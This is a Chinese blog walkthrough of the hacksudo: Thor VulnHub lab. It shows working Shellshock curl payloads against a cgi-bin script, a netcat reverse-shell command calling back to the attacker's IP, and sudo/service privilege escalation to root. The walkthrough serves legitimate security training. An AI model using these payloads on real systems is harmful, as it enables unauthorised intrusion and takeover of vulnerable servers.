vulnhub之hacksudo:Thor

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量569 收藏 2
点赞数 1
分类专栏: Vulnhub 文章标签: p2p linux 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/124936654
版权

目录

地址:

一、主机发现

二、端口扫描

三、服务版本发现

四、信息收集

1.页面源码

 2.访问cgi-bin

 五、目录爆破

六、信息收集2

1.README.md

 2.admin_login

 3.index.php/login

 4.网站源码

(1)管理员账户密码

七、登录管理员后台

八、破壳漏洞-突破边界

1.破壳漏洞

2.nmap检测破壳漏洞是否存在

3.利用

 4.尝试反弹shell

 九、提权

1.利用python美化shell

2.sudo -l

3.尝试以thor用户执行

4.执行shell命令并美化

5.找flag

6.sudo -l

7.利用service提权

地址:

https://download.vulnhub.com/hacksudo/hacksudo---Thor.ziphttps://download.vulnhub.com/hacksudo/hacksudo---Thor.zip

一、主机发现

fping -gaq 192.168.43.27/24

g生成一个网段列表

a发现存活主机

q安静模式,不显示扫描过程,只显示结果

二、端口扫描

三、服务版本发现

四、信息收集

1.页面源码

把所有的页面源码全部查看一遍,可以发现

有一个images的路径,尝试查看,但是对我们突破边界来说没有太多的帮助

 在注释中可以看到cgi-bin,我们通过搜索可知这是一个目录,也是一个公共网关接口

 2.访问cgi-bin

出现了403forbidden,证明了这确实存在。

 五、目录爆破

六、信息收集2

1.README.md

在查看这个文件时,我们能了解到数据库信息,后端语言,前端语言框架等,还有最重要的一条这个应用在利用了github上的开源代码。

 2.admin_login

是一个登录框

 3.index.php/login

也是个登录框,有句话和张图片

 4.网站源码

(1)管理员账户密码

可以看到默认的密码和用户名,尝试去登录,可惜两个登录框都不行。但是admin_login我们成功的登录进去了。

七、登录管理员后台

在管理员后台,我们可以找到用户的个人信息,也存在sql注入,但是呢这些并不足以让我们突破边界。

八、破壳漏洞-突破边界

1.破壳漏洞

破壳”是Bash(GNU Bourne Again Shell)中出现的允许攻击者通过环境变量执行任意命令的漏洞。

但是呢,我们有登录不到shell怎么执行捏,但是cgi-bin为我们搭建了一个前往shell的通路。

2.nmap检测破壳漏洞是否存在

状态存在漏洞可利用,漏洞编号都有。

3.利用

定义的环境变量有函数的话,环境变量会把字符串解析为函数,在shell中执行,但在函数结束后,没有退出bash,而是继续执行后边的命令。

这里用curl工具-H参数自定义请求头部内容,为什么要把注入payload写入user-agent中,因为对于HTTP头部,CGI脚本解析器会将其当作环境变量,调用bash的env相关函数设置到临时环境变量中;

curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id" \http://192.168.43.156/cgi-bin/shell.sh

 4.尝试反弹shell

curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/bash -c ' nc -e /bin/bash 192.168.43.27 5555 ' " \http://192.168.43.156/cgi-bin/shell.sh

成功反弹。突破边界

 九、提权

1.利用python美化shell

python -c "import pty;pty.spawn('/bin/bash')"

还可用:

SHELL=/bin/bash script -q /dev/null

2.sudo -l

查看可以执行的和不能执行的命令。有一个可能运行的指令 ,在其他目录中未发现有用的信息

3.尝试以thor用户执行

经过测试发现第一个输入框的数据会显示i am $,而第二个可以以thor用户身份来执行命令。

4.执行shell命令并美化

SHELL=/bin/bash script -q /dev/null

5.找flag

6.sudo -l

查看可以执行的指令

7.利用service提权

说明网站:

https://gtfobins.github.io/gtfobins/service/

 提权成功,拿到第二个flag   root.txt

梅_花_七
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
thor:Thor是我们公司的机器人
07-18
您可以通过运行以下命令在本地启动 Thor: % bin/hubot 你会看到一些关于你的脚本来自哪里的启动输出和一个提示: [Sun, 04 Dec 2011 18:41:11 GMT] INFO Loading adapter shell [Sun, 04 Dec 2011 18:41:11 ...
analyze-nnls:Thor编写的analyze NNLS软件包
07-07
《analyze-nnls:深入理解Thor的非负最小二乘法软件包》 在MATLAB编程环境中,非负最小二乘法(Non-Negative Least Squares, NNLS)是一种广泛应用的数学工具,常用于处理非负约束的线性回归问题。在实际应用中,如...
hacksudo-ThorVulnhub
wcl20010的博客
05-26 687
靶机地址:hacksudo: Thor ~ VulnHub 利用的技术 shellshock破壳漏洞<–cgi-bin–> GTFOBins提权 github开源源码泄露 什么是破壳漏洞? bash环境变量 var="hello world" //一个简单的环境变量 =前后不能有空格 使用它输入命令: echo $var //输出就是你定义的内容 如果此时再输入bash 那么得到的就是bash的子进程 -》var就不能访问了:echo $var 子进程可以访问
hack the box oopsie 靶场练习
鸥鹭忘机
07-30 1134
扫描收集信息 今天来练习hack the box中的oopsie靶场,如何连接这里不做过多赘述。 连接过程可以参考上一篇博客进行了解:https://blog.csdn.net/rpsate/article/details/119190220 首先扫描一下端口与服务信息 nmap -sV -F 10.10.10.28 -sV 代表扫描端口和开放的服务信息 -F 快速扫描,扫描常用的端口 好我们看到了开放了80端口,应该是一台WEB服务器,我们通过浏览器访问一下这个IP试一下。 果然出现了网页,
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1418
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
vulnhub DC6 靶场练习
鸥鹭忘机
08-19 542
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第六台,下载地址为https://www.vulnhub.com/entry/dc-6,315/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。 这次在靶机下载的页面,官方给出的线索,在接下来的破解中需要用到这条线索。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后
Hacker The Box 之 Oopsie 9
Angelxiqi的博客
05-03 1649
内容篇幅略长,创作不易,感谢支持!
雷神:Thor是用于构建强大的命令行界面的工具包
02-22
Thor是用于构建自我记录命令行实用程序的简单有效的工具。 它消除了解析命令行选项,编写“ USAGE:”标语的麻烦,并且还可以用作构建工具的替代方法。 语法类似于Rake,因此大多数Rake用户应该熟悉它。 请注意:...
namegame:Thor Bossoyt 和我的 2014 年秋季有趣的小应用程序
07-12
【标题】"namegame: Thor Bossoyt 和我的 2014 年秋季有趣的小应用程序" 提到的是一个在2014年秋季由Thor Bossoyt参与开发的趣味应用。这个应用被称为“名称游戏”,暗示它可能是一个与命名、猜名或以名字为主题的...
DemoSaaSBoard:DemoSaaSBoard Thor
03-04
【DemoSaaSBoard:DemoSaaSBoard Thor】是一款基于JavaScript技术构建的云端应用演示平台,专为SaaS(Software as a Service)服务提供了一个全面的展示环境。此项目名为"Thor",可能代表着力量和稳定性,暗示着该...
hack_fish_sudo:这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
03-26
hack_fish_sudo 这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
Vulnhub_HACKSUDO: THOR
qq_45434762的博客
09-04 718
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
Vulnhub_hacksudo-search
qq_45434762的博客
05-09 915
主机信息kali: 192.168.1.10 hacksudo-search: 192.168.1.9 信息收集通过信息收集发信目标追击开发22、80两个端口nmap -T4 -A -v ...
VnlnHub hacksudo-Thor
weixin_45682839的博客
10-08 484
涉及知识包括:端口服务探测、敏感目录收集、后台弱口令、SQL注入、逻辑漏洞、破壳漏洞、linux本地提权等。
vulnhub靶场-hacksudo - Thor
qq_42947816的博客
06-30 984
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
带你玩转渗透测试靶场Vulnhub——hacksudo3
m0_74025111的博客
04-24 523
从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。
靶机渗透练习94-hacksudo:2 (HackDudo)
hirak0的博客
05-07 788
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/ Description N/A This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.13 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下
shell编程之——/dev/null作用
qq_36412715的博客
11-02 446
cat /dev/null &gt; tmp #清空tmp文件。 若tmp文件不存在,则会创建一个空的tmp文件,若tmp文件存在,则会清空tmp文件。 cat filename &gt;/dev/null #禁止标准输出 可以把/dev/null看作"黑洞"。它非常等价于一个只写文件,所有写入它的内容都会永远丢失,而尝试从它那儿读取内容则什么也读不到. ...
Linux中关于/dev/null 的解释
choufengyin7439的博客
11-06 366
Linux/Unix中,一般在屏幕上面看到的信息是从stdout (standard output) 或者 stderr (standard error output) 来的。许多人会问,output 就是 output,送到屏幕上不就得了,为什麼还要分成stdout 和 stderr 呢?...
thor 1.5.0 ipa
08-27
Thor 1.5.0是一款独立的iOS应用程序(IPA格式),用于管理和优化iPhone和iPad的系统。它提供了一系列功能,帮助用户更好地管理他们的设备并提高其性能。 Thor 1.5.0的一项主要功能是内存清理。它可以扫描设备上的内存使用情况,并清理不再使用的数据,以释放内存空间,从而提高设备的速度和响应能力。内存清理还能够减少应用程序的崩溃频率,提升设备的稳定性。 此外,Thor 1.5.0还提供了网络连接优化功能。它可以检测并排查设备上的网络问题,并自动修复连接错误,以确保设备能够更好地连接到互联网和其他设备。这可以提高用户的网络体验,使他们能够更快地加载网页、流畅地播放视频和音乐等。 Thor 1.5.0还具备电池管理功能。它可以监控设备上各个应用程序的电池消耗情况,并提供相应的建议和优化策略,以延长设备的电池续航时间。这对于经常使用移动设备的用户来说非常有用,可以让他们在外出或旅行时更长时间地使用设备而不用担心电池耗尽。 总之,Thor 1.5.0是一款功能强大的iOS应用程序,它通过内存清理、网络连接优化和电池管理等功能,帮助用户更好地管理和优化他们的iPhone和iPad设备。无论是提升设备的速度和性能,还是延长电池续航时间,Thor 1.5.0都能给用户带来极大的便利和实用价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值